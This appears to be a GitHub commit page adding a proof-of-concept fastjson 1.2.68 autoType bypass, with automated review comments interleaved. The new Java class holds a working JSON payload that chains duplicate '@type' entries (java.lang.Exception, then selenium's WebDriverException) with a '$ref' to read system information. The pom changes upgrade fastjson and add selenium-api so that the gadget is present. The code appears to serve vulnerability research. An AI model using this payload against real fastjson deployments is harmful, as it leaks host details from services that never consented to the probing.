Commit 08602ce

author
“threedr3am”
committed
add:fastjson gadget bypass 1.2.68 autoType - leak
1 parent 91f5208 commit 08602ce

3 files changed

+44
-2
lines changed

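--- a/fastjson/pom.xml
+++ b/fastjson/pom.xml
@@ -16,7 +16,7 @@
 <dependency>
 <groupId>com.alibaba</groupId>
 <artifactId>fastjson</artifactId>
-<version>1.2.62</version>
+<version>1.2.68</version>
 </dependency>
 
 <dependency>
@@ -32,6 +32,19 @@
 <version>3.4.1</version>
 </dependency>
 
+<dependency>
+<groupId>org.seleniumhq.selenium</groupId>
+<artifactId>selenium-api</artifactId>
+<version>3.141.59</version>
+</dependency>
+
+<!-- https://mvnrepository.com/artifact/org.apache.abdera/abdera-core -->
+<dependency>
+<groupId>org.apache.abdera</groupId>
+<artifactId>abdera-server</artifactId>
+<version>1.1.2</version>
+</dependency>
+
 <dependency>
 <groupId>commons-configuration</groupId>
 <artifactId>commons-configuration</artifactId>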
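Review bot: The comment above the second added dependency links to `abdera-core`, but the `artifactId` that follows is `abdera-server`, so the comment and the declaration disagree; one of them should be corrected, e.g. `<!-- https://mvnrepository.com/artifact/org.apache.abdera/abdera-server -->`. Nothing else on this page references Abdera, since the only class added uses `org.openqa.selenium.WebDriverException`, so if this dependency serves a different demo it would be clearer to add it in that commit. Both new dependencies are declared at the default compile scope, which enlarges the set of classes resolvable through `@type` for every demo in this module; a one-line comment naming the demo each dependency serves would keep that deliberate and make later cleanup easier.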
Lines changed: 29 additions & 0 deletions
@@ -0,0 +1,29 @@
1+
package com.threedr3am.bug.fastjson.leak;
2+
3+
import com.alibaba.fastjson.JSON;
4+
import com.alibaba.fastjson.JSONObject;
5+
6+
/**
7+
* bypass autotype <= 1.2.68
8+
*/
9+
public class seleniumBypassAutotype1_2_68 {
10+
11+
public static void main(String[] args) {
12+
13+
String payload = "\n"
14+
+ "{\n"
15+
+ " \"name\":\"tony\",\n"
16+
+ " \"email\":\"[email protected]\",\n"
17+
+ " \"content\":{\"$ref\":\"$x.systemInformation\"},\n"
18+
+ " \"x\":{\n"
19+
+ " \"@type\":\"java.lang.Exception\",\"@type\":\"org.openqa.selenium.WebDriverException\"\n"
20+
+ " }\n"
21+
+ "}";
22+
try {
23+
JSONObject jsonObject = JSON.parseObject(payload);
24+
System.out.println(jsonObject.getString("content"));
25+
} catch (Exception e) {
26+
e.printStackTrace();
27+
}
28+
}
29+
}
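Review bot: The class Javadoc `bypass autotype <= 1.2.68` does not say what the demo discloses or what it depends on. From the payload, `content` is a `$ref` to `x.systemInformation`, so the value printed by `System.out.println(jsonObject.getString("content"))` is whatever `WebDriverException` exposes through that getter, and the demo presumably only works with selenium-api on the classpath and fastjson's type checking left at its defaults. I would expand the Javadoc to state those preconditions and the kind of data returned, and to name the defensive counterpart, for example enabling safe mode with `ParserConfig.getGlobalInstance().setSafeMode(true)` so that `@type` is rejected outright. Separately, the class name starts with a lower-case letter; `SeleniumBypassAutotype1_2_68` would follow Java naming convention.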

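--- a/feature/pom.xml
+++ b/feature/pom.xml
@@ -51,7 +51,7 @@
 <dependency>
 <groupId>com.alibaba</groupId>
 <artifactId>fastjson</artifactId>
-<version>1.2.62</version>
+<version>1.2.68</version>
 </dependency>
 </dependencies>
 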